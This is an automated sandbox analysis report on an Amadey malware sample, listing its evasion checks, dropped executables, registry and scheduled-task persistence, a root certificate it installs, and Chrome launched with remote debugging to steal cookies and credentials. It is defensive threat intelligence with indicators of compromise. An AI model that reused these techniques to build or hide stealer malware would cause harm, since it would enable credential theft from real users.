amadey | 4aa590b050b7b8d4f8b2ed95b93347e9f27151bd78430aa57ec787090641bcd5

Virtualization/Sandbox Evasion

credential_access stealer

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	f8bcf7e83e.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	4aa590b050b7b8d4f8b2ed95b93347e9f27151bd78430aa57ec787090641bcd5.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ba9783936d.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	72c1b8c8ee.exe

Downloads MZ/PE file

Uses browser remote debugging 2 TTPs 4 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
3340	chrome.exe
3468	chrome.exe
3920	chrome.exe
3948	chrome.exe

Checks BIOS information in registry 2 TTPs 10 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	72c1b8c8ee.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f8bcf7e83e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ba9783936d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4aa590b050b7b8d4f8b2ed95b93347e9f27151bd78430aa57ec787090641bcd5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ba9783936d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	72c1b8c8ee.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f8bcf7e83e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4aa590b050b7b8d4f8b2ed95b93347e9f27151bd78430aa57ec787090641bcd5.exe

Executes dropped EXE 8 IoCs

pid	Process
2952	skotes.exe
2044	1Shasou.exe
1972	ba9783936d.exe
2824	72c1b8c8ee.exe
1548	f8bcf7e83e.exe
2884	3acce6d1d3.exe
3152	service123.exe
3760	service123.exe

Identifies Wine through registry keys 2 TTPs 5 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine	72c1b8c8ee.exe
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine	f8bcf7e83e.exe
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine	4aa590b050b7b8d4f8b2ed95b93347e9f27151bd78430aa57ec787090641bcd5.exe
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine	ba9783936d.exe

Loads dropped DLL 16 IoCs

pid	Process
2472	4aa590b050b7b8d4f8b2ed95b93347e9f27151bd78430aa57ec787090641bcd5.exe
2472	4aa590b050b7b8d4f8b2ed95b93347e9f27151bd78430aa57ec787090641bcd5.exe
2952	skotes.exe
2952	skotes.exe
2952	skotes.exe
2952	skotes.exe
2952	skotes.exe
2952	skotes.exe
2952	skotes.exe
1972	ba9783936d.exe
1972	ba9783936d.exe
3780	WerFault.exe
3780	WerFault.exe
3780	WerFault.exe
3152	service123.exe
3760	service123.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\72c1b8c8ee.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1009176001\\72c1b8c8ee.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\f8bcf7e83e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1009177001\\f8bcf7e83e.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\3acce6d1d3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1009178001\\3acce6d1d3.exe"	skotes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0005000000019625-150.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

pid	Process
2472	4aa590b050b7b8d4f8b2ed95b93347e9f27151bd78430aa57ec787090641bcd5.exe
2952	skotes.exe
1972	ba9783936d.exe
2824	72c1b8c8ee.exe
1548	f8bcf7e83e.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	4aa590b050b7b8d4f8b2ed95b93347e9f27151bd78430aa57ec787090641bcd5.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3780	1972	WerFault.exe	34

System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	72c1b8c8ee.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f8bcf7e83e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3acce6d1d3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4aa590b050b7b8d4f8b2ed95b93347e9f27151bd78430aa57ec787090641bcd5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1Shasou.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ba9783936d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ba9783936d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ba9783936d.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
2324	taskkill.exe
3028	taskkill.exe
2872	taskkill.exe
2236	taskkill.exe
1260	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_Classes\Local Settings	firefox.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	72c1b8c8ee.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	72c1b8c8ee.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	72c1b8c8ee.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
4044	schtasks.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
2472	4aa590b050b7b8d4f8b2ed95b93347e9f27151bd78430aa57ec787090641bcd5.exe
2952	skotes.exe
1972	ba9783936d.exe
2824	72c1b8c8ee.exe
1548	f8bcf7e83e.exe
2884	3acce6d1d3.exe
2884	3acce6d1d3.exe
3468	chrome.exe
3468	chrome.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeDebugPrivilege	2324	taskkill.exe
Token: SeDebugPrivilege	3028	taskkill.exe
Token: SeDebugPrivilege	2872	taskkill.exe
Token: SeDebugPrivilege	2236	taskkill.exe
Token: SeDebugPrivilege	1260	taskkill.exe
Token: SeDebugPrivilege	2300	firefox.exe
Token: SeDebugPrivilege	2300	firefox.exe
Token: SeShutdownPrivilege	3468	chrome.exe
Token: SeShutdownPrivilege	3468	chrome.exe
Token: SeShutdownPrivilege	3468	chrome.exe
Token: SeShutdownPrivilege	3468	chrome.exe

Suspicious use of FindShellTrayWindow 49 IoCs

pid	Process
2472	4aa590b050b7b8d4f8b2ed95b93347e9f27151bd78430aa57ec787090641bcd5.exe
2884	3acce6d1d3.exe
2884	3acce6d1d3.exe
2884	3acce6d1d3.exe
2884	3acce6d1d3.exe
2884	3acce6d1d3.exe
2300	firefox.exe
2300	firefox.exe
2300	firefox.exe
2300	firefox.exe
2884	3acce6d1d3.exe
2884	3acce6d1d3.exe
2884	3acce6d1d3.exe
2884	3acce6d1d3.exe
2884	3acce6d1d3.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe
3468	chrome.exe

Suspicious use of SendNotifyMessage 13 IoCs

pid	Process
2884	3acce6d1d3.exe
2884	3acce6d1d3.exe
2884	3acce6d1d3.exe
2884	3acce6d1d3.exe
2884	3acce6d1d3.exe
2300	firefox.exe
2300	firefox.exe
2300	firefox.exe
2884	3acce6d1d3.exe
2884	3acce6d1d3.exe
2884	3acce6d1d3.exe
2884	3acce6d1d3.exe
2884	3acce6d1d3.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2472 wrote to memory of 2952	2472	4aa590b050b7b8d4f8b2ed95b93347e9f27151bd78430aa57ec787090641bcd5.exe	30
PID 2472 wrote to memory of 2952	2472	4aa590b050b7b8d4f8b2ed95b93347e9f27151bd78430aa57ec787090641bcd5.exe	30
PID 2472 wrote to memory of 2952	2472	4aa590b050b7b8d4f8b2ed95b93347e9f27151bd78430aa57ec787090641bcd5.exe	30
PID 2472 wrote to memory of 2952	2472	4aa590b050b7b8d4f8b2ed95b93347e9f27151bd78430aa57ec787090641bcd5.exe	30
PID 2952 wrote to memory of 2044	2952	skotes.exe	33
PID 2952 wrote to memory of 2044	2952	skotes.exe	33
PID 2952 wrote to memory of 2044	2952	skotes.exe	33
PID 2952 wrote to memory of 2044	2952	skotes.exe	33
PID 2952 wrote to memory of 1972	2952	skotes.exe	34
PID 2952 wrote to memory of 1972	2952	skotes.exe	34
PID 2952 wrote to memory of 1972	2952	skotes.exe	34
PID 2952 wrote to memory of 1972	2952	skotes.exe	34
PID 2952 wrote to memory of 2824	2952	skotes.exe	35
PID 2952 wrote to memory of 2824	2952	skotes.exe	35
PID 2952 wrote to memory of 2824	2952	skotes.exe	35
PID 2952 wrote to memory of 2824	2952	skotes.exe	35
PID 2952 wrote to memory of 1548	2952	skotes.exe	36
PID 2952 wrote to memory of 1548	2952	skotes.exe	36
PID 2952 wrote to memory of 1548	2952	skotes.exe	36
PID 2952 wrote to memory of 1548	2952	skotes.exe	36
PID 2952 wrote to memory of 2884	2952	skotes.exe	37
PID 2952 wrote to memory of 2884	2952	skotes.exe	37
PID 2952 wrote to memory of 2884	2952	skotes.exe	37
PID 2952 wrote to memory of 2884	2952	skotes.exe	37
PID 2884 wrote to memory of 2324	2884	3acce6d1d3.exe	38
PID 2884 wrote to memory of 2324	2884	3acce6d1d3.exe	38
PID 2884 wrote to memory of 2324	2884	3acce6d1d3.exe	38
PID 2884 wrote to memory of 2324	2884	3acce6d1d3.exe	38
PID 2884 wrote to memory of 3028	2884	3acce6d1d3.exe	41
PID 2884 wrote to memory of 3028	2884	3acce6d1d3.exe	41
PID 2884 wrote to memory of 3028	2884	3acce6d1d3.exe	41
PID 2884 wrote to memory of 3028	2884	3acce6d1d3.exe	41
PID 2884 wrote to memory of 2872	2884	3acce6d1d3.exe	43
PID 2884 wrote to memory of 2872	2884	3acce6d1d3.exe	43
PID 2884 wrote to memory of 2872	2884	3acce6d1d3.exe	43
PID 2884 wrote to memory of 2872	2884	3acce6d1d3.exe	43
PID 2884 wrote to memory of 2236	2884	3acce6d1d3.exe	45
PID 2884 wrote to memory of 2236	2884	3acce6d1d3.exe	45
PID 2884 wrote to memory of 2236	2884	3acce6d1d3.exe	45
PID 2884 wrote to memory of 2236	2884	3acce6d1d3.exe	45
PID 2884 wrote to memory of 1260	2884	3acce6d1d3.exe	47
PID 2884 wrote to memory of 1260	2884	3acce6d1d3.exe	47
PID 2884 wrote to memory of 1260	2884	3acce6d1d3.exe	47
PID 2884 wrote to memory of 1260	2884	3acce6d1d3.exe	47
PID 2884 wrote to memory of 1684	2884	3acce6d1d3.exe	49
PID 2884 wrote to memory of 1684	2884	3acce6d1d3.exe	49
PID 2884 wrote to memory of 1684	2884	3acce6d1d3.exe	49
PID 2884 wrote to memory of 1684	2884	3acce6d1d3.exe	49
PID 1684 wrote to memory of 2300	1684	firefox.exe	50
PID 1684 wrote to memory of 2300	1684	firefox.exe	50
PID 1684 wrote to memory of 2300	1684	firefox.exe	50
PID 1684 wrote to memory of 2300	1684	firefox.exe	50
PID 1684 wrote to memory of 2300	1684	firefox.exe	50
PID 1684 wrote to memory of 2300	1684	firefox.exe	50
PID 1684 wrote to memory of 2300	1684	firefox.exe	50
PID 1684 wrote to memory of 2300	1684	firefox.exe	50
PID 1684 wrote to memory of 2300	1684	firefox.exe	50
PID 1684 wrote to memory of 2300	1684	firefox.exe	50
PID 1684 wrote to memory of 2300	1684	firefox.exe	50
PID 1684 wrote to memory of 2300	1684	firefox.exe	50
PID 2300 wrote to memory of 2388	2300	firefox.exe	51
PID 2300 wrote to memory of 2388	2300	firefox.exe	51
PID 2300 wrote to memory of 2388	2300	firefox.exe	51
PID 2300 wrote to memory of 2916	2300	firefox.exe	52

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\4aa590b050b7b8d4f8b2ed95b93347e9f27151bd78430aa57ec787090641bcd5.exe
"C:\Users\Admin\AppData\Local\Temp\4aa590b050b7b8d4f8b2ed95b93347e9f27151bd78430aa57ec787090641bcd5.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2472
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2952
- - C:\Users\Admin\AppData\Local\Temp\1009157001\1Shasou.exe
    "C:\Users\Admin\AppData\Local\Temp\1009157001\1Shasou.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2044
- - C:\Users\Admin\AppData\Local\Temp\1009175001\ba9783936d.exe
    "C:\Users\Admin\AppData\Local\Temp\1009175001\ba9783936d.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Loads dropped DLL
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:1972
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:3468
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef45b9758,0x7fef45b9768,0x7fef45b9778
        5⤵
        
        PID:3480
    - - C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        5⤵
        
        PID:3592
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1176 --field-trial-handle=1296,i,18364658200965414235,17413037429063973466,131072 /prefetch:2
        5⤵
        
        PID:3656
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1500 --field-trial-handle=1296,i,18364658200965414235,17413037429063973466,131072 /prefetch:8
        5⤵
        
        PID:3672
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1624 --field-trial-handle=1296,i,18364658200965414235,17413037429063973466,131072 /prefetch:8
        5⤵
        
        PID:3696
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1616 --field-trial-handle=1296,i,18364658200965414235,17413037429063973466,131072 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:3920
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2348 --field-trial-handle=1296,i,18364658200965414235,17413037429063973466,131072 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:3948
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=3284 --field-trial-handle=1296,i,18364658200965414235,17413037429063973466,131072 /prefetch:2
        5⤵
        
        PID:3248
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1444 --field-trial-handle=1296,i,18364658200965414235,17413037429063973466,131072 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:3340
  - - C:\Users\Admin\AppData\Local\Temp\service123.exe
      "C:\Users\Admin\AppData\Local\Temp\service123.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
